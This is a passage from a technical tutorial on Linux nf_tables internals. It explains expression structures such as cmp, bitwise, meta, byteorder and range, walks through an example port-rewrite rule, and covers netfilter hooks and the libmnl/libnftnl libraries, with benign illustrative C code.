	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_cmp_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first parameter we have here is <code class="language-plaintext highlighter-rouge">data</code>. This is the constant data against which we are going to be comparing. So one of our arguments in the comparison is always constant. The other is defined by <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code>.</p>

<p>Now we have to take a look at the type of relational operators.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_cmp_ops - nf_tables relational operator
 *
 * @NFT_CMP_EQ: equal
 * @NFT_CMP_NEQ: not equal
 * @NFT_CMP_LT: less than
 * @NFT_CMP_LTE: less than or equal to
 * @NFT_CMP_GT: greater than
 * @NFT_CMP_GTE: greater than or equal to
 */</span>
<span class="k">enum</span> <span class="n">nft_cmp_ops</span> <span class="p">{</span>
	<span class="n">NFT_CMP_EQ</span><span class="p">,</span>
	<span class="n">NFT_CMP_NEQ</span><span class="p">,</span>
	<span class="n">NFT_CMP_LT</span><span class="p">,</span>
	<span class="n">NFT_CMP_LTE</span><span class="p">,</span>
	<span class="n">NFT_CMP_GT</span><span class="p">,</span>
	<span class="n">NFT_CMP_GTE</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>For example if we choose <code class="language-plaintext highlighter-rouge">NFT_CMP_LT</code> the comparison is going to be <code class="language-plaintext highlighter-rouge">register &lt; data</code> where register is the data we get from <code class="language-plaintext highlighter-rouge">sreg</code> (with length <code class="language-plaintext highlighter-rouge">len</code>) and data is the constant data that we are providing to the expression.</p>

<p>But what happens if the comparison evaluates to true, and what happens if it evaluates to false?
If it evaluates to true, execution continues normally down the expressions in the current rule.
If it evaluates to false, it sets the verdict code to <code class="language-plaintext highlighter-rouge">NFT_BREAK</code>, which means that no more expressions will be executed in the current rule, but execution then continues normally with the rest of the rules in the chain.</p>
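<p>The behaviour described above can be modelled with a small userspace function. This is a sketch with hypothetical <code class="language-plaintext highlighter-rouge">demo_*</code> names, assuming a bytewise <code class="language-plaintext highlighter-rouge">memcmp</code>-style comparison of <code class="language-plaintext highlighter-rouge">len</code> bytes of register data against the constant; the real evaluation writes the verdict into the registers instead of returning it.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum demo_cmp_op {
	DEMO_CMP_EQ,
	DEMO_CMP_NEQ,
	DEMO_CMP_LT,
	DEMO_CMP_LTE,
	DEMO_CMP_GT,
	DEMO_CMP_GTE,
};

enum demo_verdict {
	DEMO_CONTINUE, /* condition met: keep running the rule's expressions */
	DEMO_BREAK,    /* condition not met: skip the rest of this rule */
};

/* Evaluates "register <op> data" over len bytes, compared bytewise. */
enum demo_verdict demo_cmp_eval(enum demo_cmp_op op, const void *reg,
				const void *data, size_t len)
{
	int d, match = 0;

	assert(reg != NULL && data != NULL);
	d = memcmp(reg, data, len); /* <0, 0 or >0, like strcmp */

	switch (op) {
	case DEMO_CMP_EQ:  match = (d == 0); break;
	case DEMO_CMP_NEQ: match = (d != 0); break;
	case DEMO_CMP_LT:  match = (d < 0);  break;
	case DEMO_CMP_LTE: match = (d <= 0); break;
	case DEMO_CMP_GT:  match = (d > 0);  break;
	case DEMO_CMP_GTE: match = (d >= 0); break;
	}

	return match ? DEMO_CONTINUE : DEMO_BREAK;
}
```

<p>Because the comparison is bytewise, multi-byte values compare in the order you would expect only when they are stored most significant byte first, which is how they appear in packet headers.</p>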

<h3 id="nft_bitwise-">nft_bitwise <a name="nft_bitwise"></a></h3>
<p>Now we are going to take a look at an expression that performs bitwise operations on the registers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_bitwise</span> <span class="p">{</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_bitwise_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">mask</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">xor</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first obvious parameters are <code class="language-plaintext highlighter-rouge">sreg</code>, <code class="language-plaintext highlighter-rouge">dreg</code> and <code class="language-plaintext highlighter-rouge">len</code>. The parameters <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code> define which registers we are going to perform the operation on, and <code class="language-plaintext highlighter-rouge">dreg</code> defines where the result is going to be put after the bitwise operation has been performed.</p>

<p>Now it is time to take a look at the different bitwise operations.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_bitwise_ops - nf_tables bitwise operations
 *
 * @NFT_BITWISE_BOOL: mask-and-xor operation used to implement NOT, AND, OR and
 *                    XOR boolean operations
 * @NFT_BITWISE_LSHIFT: left-shift operation
 * @NFT_BITWISE_RSHIFT: right-shift operation
 */</span>
<span class="k">enum</span> <span class="n">nft_bitwise_ops</span> <span class="p">{</span>
	<span class="n">NFT_BITWISE_BOOL</span><span class="p">,</span>
	<span class="n">NFT_BITWISE_LSHIFT</span><span class="p">,</span>
	<span class="n">NFT_BITWISE_RSHIFT</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The parameters <code class="language-plaintext highlighter-rouge">mask</code> and <code class="language-plaintext highlighter-rouge">xor</code> are set when the operation is <code class="language-plaintext highlighter-rouge">NFT_BITWISE_BOOL</code>, that is, when we want to perform a boolean operation. The <code class="language-plaintext highlighter-rouge">data</code> parameter has to be set if the operation is <code class="language-plaintext highlighter-rouge">NFT_BITWISE_LSHIFT</code> or <code class="language-plaintext highlighter-rouge">NFT_BITWISE_RSHIFT</code>; it holds the amount we want to shift by.</p>
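<p>It may not be obvious how a single mask-and-xor step covers NOT, AND, OR and XOR. The sketch below works it through on one 32-bit word, using the form <code class="language-plaintext highlighter-rouge">(src &amp; mask) ^ xor</code>. The <code class="language-plaintext highlighter-rouge">demo_*</code> helpers are hypothetical and only show which <code class="language-plaintext highlighter-rouge">mask</code> and <code class="language-plaintext highlighter-rouge">xor</code> values give each boolean operation.</p>

```c
#include <assert.h>
#include <stdint.h>

/* The one primitive: mask first, then xor. */
uint32_t demo_bitwise_bool(uint32_t src, uint32_t mask, uint32_t xor_val)
{
	return (src & mask) ^ xor_val;
}

/* src & m: keep the masked bits, flip nothing. */
uint32_t demo_and(uint32_t src, uint32_t m)
{
	return demo_bitwise_bool(src, m, 0);
}

/* src | m: clear the bits of m, then flip them back on. */
uint32_t demo_or(uint32_t src, uint32_t m)
{
	return demo_bitwise_bool(src, ~m, m);
}

/* src ^ x: keep every bit, flip the bits of x. */
uint32_t demo_xor(uint32_t src, uint32_t x)
{
	return demo_bitwise_bool(src, 0xffffffffu, x);
}

/* ~src: keep every bit, flip every bit. */
uint32_t demo_not(uint32_t src)
{
	return demo_bitwise_bool(src, 0xffffffffu, 0xffffffffu);
}
```

<p>The OR case is the least intuitive one: clearing the bits of <code class="language-plaintext highlighter-rouge">m</code> first guarantees that the following xor turns each of them on, whatever their previous value was.</p>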

<h3 id="nft_meta-">nft_meta <a name="nft_meta"></a></h3>
<p>This expression allows you to play around with packet metadata.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_meta</span> <span class="p">{</span>
	<span class="k">enum</span> <span class="n">nft_meta_keys</span>	<span class="n">key</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u8</span>		<span class="n">dreg</span><span class="p">;</span>
		<span class="n">u8</span>		<span class="n">sreg</span><span class="p">;</span>
	<span class="p">};</span>
<span class="p">};</span>
</code></pre></div></div>
<p>As you can see, it can be used in two ways. The first one is to get the metadata from the packet and write it into the registers, when <code class="language-plaintext highlighter-rouge">dreg</code> is used. The other is to get metadata from the registers and write it to the packet, when <code class="language-plaintext highlighter-rouge">sreg</code> is used.
Which metadata is going to be manipulated depends on the <code class="language-plaintext highlighter-rouge">key</code> being used.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_meta_keys - nf_tables meta expression keys
 *
 * @NFT_META_LEN: packet length (skb-&gt;len)
 * @NFT_META_PROTOCOL: packet ethertype protocol (skb-&gt;protocol), invalid in OUTPUT
 * @NFT_META_PRIORITY: packet priority (skb-&gt;priority)
 * @NFT_META_MARK: packet mark (skb-&gt;mark)
 * @NFT_META_IIF: packet input interface index (dev-&gt;ifindex)
 * @NFT_META_OIF: packet output interface index (dev-&gt;ifindex)
 * @NFT_META_IIFNAME: packet input interface name (dev-&gt;name)
 * @NFT_META_OIFNAME: packet output interface name (dev-&gt;name)
 * @NFT_META_IIFTYPE: packet input interface type (dev-&gt;type)
 * @NFT_META_OIFTYPE: packet output interface type (dev-&gt;type)
 * @NFT_META_SKUID: originating socket UID (fsuid)
 * @NFT_META_SKGID: originating socket GID (fsgid)
 * @NFT_META_NFTRACE: packet nftrace bit
 * @NFT_META_RTCLASSID: realm value of packet's route (skb-&gt;dst-&gt;tclassid)
 * @NFT_META_SECMARK: packet secmark (skb-&gt;secmark)
 * @NFT_META_NFPROTO: netfilter protocol
 * @NFT_META_L4PROTO: layer 4 protocol number
 * @NFT_META_BRI_IIFNAME: packet input bridge interface name
 * @NFT_META_BRI_OIFNAME: packet output bridge interface name
 * @NFT_META_PKTTYPE: packet type (skb-&gt;pkt_type), special handling for loopback
 * @NFT_META_CPU: cpu id through smp_processor_id()
 * @NFT_META_IIFGROUP: packet input interface group
 * @NFT_META_OIFGROUP: packet output interface group
 * @NFT_META_CGROUP: socket control group (skb-&gt;sk-&gt;sk_classid)
 * @NFT_META_PRANDOM: a 32bit pseudo-random number
 * @NFT_META_SECPATH: boolean, secpath_exists (!!skb-&gt;sp)
 * @NFT_META_IIFKIND: packet input interface kind name (dev-&gt;rtnl_link_ops-&gt;kind)
 * @NFT_META_OIFKIND: packet output interface kind name (dev-&gt;rtnl_link_ops-&gt;kind)
 * @NFT_META_BRI_IIFPVID: packet input bridge port pvid
 * @NFT_META_BRI_IIFVPROTO: packet input bridge vlan proto
 * @NFT_META_TIME_NS: time since epoch (in nanoseconds)
 * @NFT_META_TIME_DAY: day of week (from 0 = Sunday to 6 = Saturday)
 * @NFT_META_TIME_HOUR: hour of day (in seconds)
 * @NFT_META_SDIF: slave device interface index
 * @NFT_META_SDIFNAME: slave device interface name
 */</span>
</code></pre></div></div>
<p>The meta keys are… a lot.</p>

<h3 id="nft_byteorder-">nft_byteorder <a name="nft_byteorder"></a></h3>
<p>We will now look at a type of expression that can be used to change the endianness of data.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_byteorder</span> <span class="p">{</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">dreg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_byteorder_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">size</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The essential parameters are <code class="language-plaintext highlighter-rouge">sreg</code>, <code class="language-plaintext highlighter-rouge">len</code> and <code class="language-plaintext highlighter-rouge">dreg</code> that show from what register we get the data that we are going to perform the action on, how big it is and where we are going to put it.
There is an operation parameter <code class="language-plaintext highlighter-rouge">op</code> that can hold two values.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_byteorder_ops - nf_tables byteorder operators
 *
 * @NFT_BYTEORDER_NTOH: network to host operator
 * @NFT_BYTEORDER_HTON: host to network operator
 */</span>
<span class="k">enum</span> <span class="n">nft_byteorder_ops</span> <span class="p">{</span>
	<span class="n">NFT_BYTEORDER_NTOH</span><span class="p">,</span>
	<span class="n">NFT_BYTEORDER_HTON</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first type of operation is <strong>network to host</strong>, where we convert from network byte order (big-endian) to host byte order, whatever that might be (little-endian on the x86 family).
The other type of operation is <strong>host to network</strong>, which is the opposite: it converts from host byte order to network byte order.</p>

<p>The last parameter is <code class="language-plaintext highlighter-rouge">size</code>. This is the size in bytes of each <strong>integer</strong> whose endianness will be changed. It can take one of a few discrete values: 2, 4 or 8.</p>
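<p>To make the interplay of <code class="language-plaintext highlighter-rouge">len</code> and <code class="language-plaintext highlighter-rouge">size</code> more concrete, here is a minimal userspace sketch. It is not the kernel code: the names <code class="language-plaintext highlighter-rouge">byteorder_convert</code>, <code class="language-plaintext highlighter-rouge">swap_bytes</code> and <code class="language-plaintext highlighter-rouge">enum byteorder_op</code> are made up for illustration, and the requirement that <code class="language-plaintext highlighter-rouge">len</code> is a multiple of <code class="language-plaintext highlighter-rouge">size</code> is an assumption of the sketch.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for enum nft_byteorder_ops. */
enum byteorder_op { BYTEORDER_NTOH, BYTEORDER_HTON };

/* Reverse the bytes of one integer of `size` bytes in place. */
static void swap_bytes(uint8_t *p, size_t size)
{
	for (size_t i = 0; i < size / 2; i++) {
		uint8_t tmp = p[i];
		p[i] = p[size - 1 - i];
		p[size - 1 - i] = tmp;
	}
}

/* Returns 1 when the host stores the least significant byte first. */
static int host_is_little_endian(void)
{
	const uint16_t probe = 1;
	uint8_t first;

	memcpy(&first, &probe, 1);
	return first == 1;
}

/*
 * Copy `len` bytes from src to dst, treating them as consecutive integers
 * of `size` bytes each and converting every one of them.
 * Returns 0 on success, -1 if size is not 2, 4 or 8, or if len is not a
 * multiple of size (the latter is an assumption of this sketch).
 */
static int byteorder_convert(uint8_t *dst, const uint8_t *src, size_t len,
			     size_t size, enum byteorder_op op)
{
	assert(dst != NULL && src != NULL);
	(void)op; /* NTOH and HTON perform the same byte permutation */

	if ((size != 2 && size != 4 && size != 8) || len % size != 0)
		return -1;

	memmove(dst, src, len);
	if (!host_is_little_endian())
		return 0; /* a big-endian host already uses network order */

	for (size_t off = 0; off < len; off += size)
		swap_bytes(dst + off, size);
	return 0;
}
```

<p>With <code class="language-plaintext highlighter-rouge">len = 4</code> and <code class="language-plaintext highlighter-rouge">size = 2</code>, the four bytes are treated as two separate 16-bit integers, each swapped on its own, rather than as one 32-bit integer.</p>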

<h3 id="nft_range_expr-">nft_range_expr <a name="nft_range_expr"></a></h3>

<p>This expression is similar to the compare expression, but instead of comparing against a constant value it compares against a constant range.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_range_expr</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data_from</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_data</span>		<span class="n">data_to</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">len</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">nft_range_ops</span>	<span class="n">op</span><span class="o">:</span><span class="mi">8</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The range is defined by <code class="language-plaintext highlighter-rouge">data_from</code> and <code class="language-plaintext highlighter-rouge">data_to</code>. The parameters <code class="language-plaintext highlighter-rouge">sreg</code> and <code class="language-plaintext highlighter-rouge">len</code> define the data we are going to be comparing against the range.
The range is inclusive - including the values passed as <code class="language-plaintext highlighter-rouge">data_from</code> and <code class="language-plaintext highlighter-rouge">data_to</code>.
The last parameter is the operation <code class="language-plaintext highlighter-rouge">op</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * enum nft_range_ops - nf_tables range operator
 *
 * @NFT_RANGE_EQ: equal
 * @NFT_RANGE_NEQ: not equal
 */</span>
<span class="k">enum</span> <span class="n">nft_range_ops</span> <span class="p">{</span>
	<span class="n">NFT_RANGE_EQ</span><span class="p">,</span>
	<span class="n">NFT_RANGE_NEQ</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>If the operation is <code class="language-plaintext highlighter-rouge">NFT_RANGE_EQ</code> and the data is outside of the range, the verdict is set to <code class="language-plaintext highlighter-rouge">NFT_BREAK</code>, meaning that the rest of the expressions in the rule are skipped and evaluation continues with the next rule in the chain. If the operation is <code class="language-plaintext highlighter-rouge">NFT_RANGE_NEQ</code>, the verdict is set to <code class="language-plaintext highlighter-rouge">NFT_BREAK</code> if the data is inside the (inclusive) range.</p>
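<p>The decision logic can be sketched in a few lines of userspace C. This is only an illustration, not the kernel implementation: <code class="language-plaintext highlighter-rouge">range_eval</code> and both enums are hypothetical names. The sketch assumes the comparison is done bytewise with <code class="language-plaintext highlighter-rouge">memcmp</code>, which orders multi-byte numbers correctly only if they are stored big-endian.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-ins for enum nft_range_ops and the resulting verdict. */
enum range_op { RANGE_EQ, RANGE_NEQ };
enum range_result { RANGE_CONTINUE, RANGE_BREAK };

/*
 * Compare `len` bytes of register data against the inclusive range
 * [from, to]. The comparison is bytewise, so numeric ordering only
 * holds for big-endian (network order) values.
 */
static enum range_result range_eval(const void *reg, const void *from,
				    const void *to, size_t len,
				    enum range_op op)
{
	int in_range;

	assert(reg != NULL && from != NULL && to != NULL);

	in_range = memcmp(reg, from, len) >= 0 && memcmp(reg, to, len) <= 0;

	if (op == RANGE_EQ)
		return in_range ? RANGE_CONTINUE : RANGE_BREAK;

	/* RANGE_NEQ: break when the data falls inside the range */
	return in_range ? RANGE_BREAK : RANGE_CONTINUE;
}
```

<p>A "continue" result here simply means that the verdict is left untouched and the next expression in the rule gets evaluated.</p>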

<h3 id="other-expressions-">Other expressions <a name="otherexpr"></a></h3>
<p>These are a few of the most commonly used expressions in nf_tables, but there are others.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/net/netfilter/nf_tables_core.h */</span> 
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_counter_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_lookup_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_dynset_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_rt_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_exthdr_type</span><span class="p">;</span>
<span class="k">extern</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_last_type</span><span class="p">;</span>
<span class="c1">// the ones we talked about are omitted  </span>
</code></pre></div></div>

<h3 id="an-example-">An example <a name="example"></a></h3>
<p>I want to give a quick example of a simple rule and how different expressions might take part in it.</p>

<p>We are going to make a rule that checks if a UDP packet’s destination port is in the range <code class="language-plaintext highlighter-rouge">50001-50009</code> and if so changes the destination port to <code class="language-plaintext highlighter-rouge">1337</code>.</p>

<table>
  <thead>
    <tr>
      <th>Expression</th>
      <th>Expression Arguments</th>
      <th>Result of expression</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>nft_payload</td>
      <td>base = NFT_PAYLOAD_TRANSPORT_HEADER<br />offset = 2<br />len = 2<br />dreg = NFT_REG32_01</td>
      <td>Copies the destination port, which is 2 bytes long and sits at offset 2 from the start of the UDP header, into the 1st register</td>
    </tr>
    <tr>
      <td>nft_range_expr</td>
      <td>data_from = (u16) 50001<br />data_to = (u16) 50009<br />sreg = NFT_REG32_01<br />len = 2<br />op = NFT_RANGE_EQ</td>
      <td>Checks if the destination port in the 1st register is in the range 50001-50009<br />If it isn’t it will set the verdict to NFT_BREAK - skipping the rest of the expressions in the rule<br />If it is in the range it will continue down the expressions</td>
    </tr>
    <tr>
      <td>nft_immediate_expr</td>
      <td>data = (u16) 1337<br />dreg = NFT_REG32_02<br />len = 2</td>
      <td>Sets the 2nd register to 1337.</td>
    </tr>
    <tr>
      <td>nft_payload_set</td>
      <td>base = NFT_PAYLOAD_TRANSPORT_HEADER<br />offset = 2<br />len = 2<br />sreg = NFT_REG32_02</td>
      <td>Changes the destination port to the value in the 2nd register (1337).</td>
    </tr>
  </tbody>
</table>
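<p>To see how the four expressions chain together, the rule can be simulated in userspace on a raw UDP header. This is a rough sketch and not how the kernel evaluates rules: <code class="language-plaintext highlighter-rouge">apply_rule</code> and the two local "registers" are made up for illustration, the ports are hardcoded in network byte order, and checksum handling is not modeled at all.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define UDP_DPORT_OFFSET 2 /* destination port offset in the UDP header */
#define PORT_LEN         2 /* ports are 2 bytes long */

/*
 * Apply the example rule to a UDP header (at least 4 bytes long).
 * Returns 1 if the destination port was rewritten, 0 if the range
 * check "broke" out of the rule and the header was left untouched.
 */
static int apply_rule(uint8_t *udp_header)
{
	/* Constants in network byte order (big-endian). */
	static const uint8_t from[PORT_LEN]     = { 0xC3, 0x51 }; /* 50001 */
	static const uint8_t to[PORT_LEN]       = { 0xC3, 0x59 }; /* 50009 */
	static const uint8_t new_port[PORT_LEN] = { 0x05, 0x39 }; /* 1337 */
	uint8_t reg1[PORT_LEN], reg2[PORT_LEN];

	assert(udp_header != NULL);

	/* nft_payload: copy the destination port into the 1st register */
	memcpy(reg1, udp_header + UDP_DPORT_OFFSET, PORT_LEN);

	/* nft_range_expr with NFT_RANGE_EQ: stop if outside the range */
	if (memcmp(reg1, from, PORT_LEN) < 0 || memcmp(reg1, to, PORT_LEN) > 0)
		return 0;

	/* nft_immediate_expr: load the constant into the 2nd register */
	memcpy(reg2, new_port, PORT_LEN);

	/* nft_payload_set: write the 2nd register back into the header */
	memcpy(udp_header + UDP_DPORT_OFFSET, reg2, PORT_LEN);
	return 1;
}
```

<p>A header with destination port 50005 comes out with destination port 1337, while a header with destination port 53 is returned unchanged because the range check stops the rule early.</p>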

<p>However, we ultimately want this rule to be triggered only if the packet is incoming. How do we do that?</p>

<p>This is determined by what hook the chain (where the rule is) uses. So let us take a look at the hooks.</p>

<h2 id="the-hooks-">The Hooks <a name="hooks"></a></h2>
<p>The netfilter hooks define at what point a chain is going to be executed. Is it going to be when a packet comes into the network? Or is it going to be on its way out?</p>

<p>There are six hooks - ingress, prerouting, input, forward, output, postrouting.
The <em>prerouting</em> and <em>input</em> hooks are triggered by traffic flowing into the network (or the local machine).
The <em>postrouting</em> and <em>output</em> are triggered by traffic flowing out of the network.
If <strong>IP forwarding</strong> is enabled so your machine can act as a router then the <strong>forward</strong> hook could also be reached after <em>prerouting</em>.</p>

<p>The last hook is the <strong>ingress hook</strong>. It is newer than the others (introduced in version 4.2).</p>

<p>The <strong>ingress hook</strong> is attached to a particular network interface. It can be used to enforce <strong>very</strong> early filtering policies, since it is triggered even before the prerouting hook. One important thing to mention: at the stage where this hook resides, fragmented datagrams have not yet been reassembled.</p>

<p>To summarize, the possible paths a packet can take are:</p>
<ul>
  <li>ingress -&gt; prerouting -&gt; input -&gt; <em>application</em></li>
  <li><em>application</em> -&gt; output -&gt; postrouting</li>
</ul>

<p>And if forwarding is enabled, the possible paths also include:</p>
<ul>
  <li>ingress -&gt; prerouting -&gt; forward -&gt; postrouting</li>
</ul>
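<p>The paths listed above can be written down as a small lookup function. This is purely illustrative: <code class="language-plaintext highlighter-rouge">hook_path</code>, <code class="language-plaintext highlighter-rouge">enum hook</code> and <code class="language-plaintext highlighter-rouge">enum traffic</code> are hypothetical names, and the sketch assumes that a packet addressed to another host stops after prerouting when forwarding is disabled.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical names for the six hooks, in no particular order. */
enum hook {
	HOOK_INGRESS,
	HOOK_PREROUTING,
	HOOK_INPUT,
	HOOK_FORWARD,
	HOOK_OUTPUT,
	HOOK_POSTROUTING,
};

/* Where the packet comes from and where it is headed. */
enum traffic {
	TRAFFIC_TO_LOCAL,   /* arrives from the network for a local application */
	TRAFFIC_FROM_LOCAL, /* produced by a local application */
	TRAFFIC_THROUGH,    /* arrives from the network for another host */
};

#define MAX_PATH_HOOKS 4

/* Fill `path` with the hooks traversed, in order, and return their count. */
static size_t hook_path(enum traffic t, int forwarding_enabled,
			enum hook path[MAX_PATH_HOOKS])
{
	size_t n = 0;

	assert(path != NULL);

	switch (t) {
	case TRAFFIC_TO_LOCAL:
		path[n++] = HOOK_INGRESS;
		path[n++] = HOOK_PREROUTING;
		path[n++] = HOOK_INPUT;
		break;
	case TRAFFIC_FROM_LOCAL:
		path[n++] = HOOK_OUTPUT;
		path[n++] = HOOK_POSTROUTING;
		break;
	case TRAFFIC_THROUGH:
		path[n++] = HOOK_INGRESS;
		path[n++] = HOOK_PREROUTING;
		if (forwarding_enabled) {
			path[n++] = HOOK_FORWARD;
			path[n++] = HOOK_POSTROUTING;
		}
		break;
	}
	return n;
}
```

<p>The takeaway is that a chain only sees a packet if it is registered on one of the hooks along that packet's path. A chain on the input hook, for example, never sees forwarded or outgoing traffic.</p>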

<p>On the <code class="language-plaintext highlighter-rouge">nftables</code> wiki a schematic can be found that simplifies stuff a bit.</p>

<p><img src="https://people.netfilter.org/pablo/nf-hooks.png" alt="nftables schematic" /></p>

<p>In the codebase the hooks are defined in the following <code class="language-plaintext highlighter-rouge">enum</code> type.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/uapi/linux/netfilter.h */</span> 

<span class="k">enum</span> <span class="n">nf_inet_hooks</span> <span class="p">{</span>
	<span class="n">NF_INET_PRE_ROUTING</span><span class="p">,</span>
	<span class="n">NF_INET_LOCAL_IN</span><span class="p">,</span>
	<span class="n">NF_INET_FORWARD</span><span class="p">,</span>
	<span class="n">NF_INET_LOCAL_OUT</span><span class="p">,</span>
	<span class="n">NF_INET_POST_ROUTING</span><span class="p">,</span>
	<span class="n">NF_INET_NUMHOOKS</span><span class="p">,</span>
	<span class="n">NF_INET_INGRESS</span> <span class="o">=</span> <span class="n">NF_INET_NUMHOOKS</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
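<p>One detail of this enum is easy to miss: <code class="language-plaintext highlighter-rouge">NF_INET_INGRESS</code> has the same numeric value as <code class="language-plaintext highlighter-rouge">NF_INET_NUMHOOKS</code>. The sketch below uses a local copy of the enum so that it compiles without kernel headers; <code class="language-plaintext highlighter-rouge">hook_name</code> is a hypothetical helper and the short names it returns are just the ones used in this article.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Local copy of the enum shown above. */
enum nf_inet_hooks {
	NF_INET_PRE_ROUTING,
	NF_INET_LOCAL_IN,
	NF_INET_FORWARD,
	NF_INET_LOCAL_OUT,
	NF_INET_POST_ROUTING,
	NF_INET_NUMHOOKS,
	NF_INET_INGRESS = NF_INET_NUMHOOKS,
};

/* The five "classic" hooks take the values 0..4, ingress aliases 5. */
static_assert(NF_INET_POST_ROUTING == 4, "classic hooks are numbered 0..4");
static_assert(NF_INET_INGRESS == 5, "ingress shares the value of NUMHOOKS");

/* Map a hook number to the short name used in this article. */
static const char *hook_name(unsigned int hooknum)
{
	switch (hooknum) {
	case NF_INET_PRE_ROUTING:  return "prerouting";
	case NF_INET_LOCAL_IN:     return "input";
	case NF_INET_FORWARD:      return "forward";
	case NF_INET_LOCAL_OUT:    return "output";
	case NF_INET_POST_ROUTING: return "postrouting";
	case NF_INET_INGRESS:      return "ingress";
	default:                   return NULL; /* not a known hook */
	}
}
```

<p>A consequence of this layout is that an array with <code class="language-plaintext highlighter-rouge">NF_INET_NUMHOOKS</code> elements has slots only for the five classic hooks, so the ingress value cannot be used as an index into it.</p>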

<h2 id="the-libraries---libmnl-and-libnftnl-">The Libraries - libmnl and libnftnl <a name="libraries"></a></h2>
<p>It is time to take a very quick look at the two libraries that significantly simplify the process of working with nf_tables.</p>

<h3 id="libmnl-">libmnl <a name="libmnl"></a></h3>
<blockquote>
  <p>libmnl is a minimalistic user-space library oriented to Netlink developers. There are a lot of common tasks in parsing, validating, constructing of both the Netlink header and TLVs that are repetitive and easy to get wrong. This library aims to provide simple helpers that allows you to re-use code and to avoid re-inventing the wheel.</p>
</blockquote>

<p>This is the description provided in the documentation. In the <a href="https://git.netfilter.org/libmnl/">libmnl repository</a> you will find some examples of how to use the library. Although it is not well documented, it can be understood to a degree through those examples.</p>

<h3 id="libnftnl-">libnftnl <a name="libnftnl"></a></h3>
<p>This is a userspace library that essentially provides an API to nf_tables. It is crucial when working with nf_tables. It requires libmnl to function.</p>

<p>In the <a href="https://git.netfilter.org/libnftnl/">libnftnl repository</a> you can find <strong>a lot</strong> of good examples showing you how to use the library. They are more than enough to give you a solid understanding.</p>

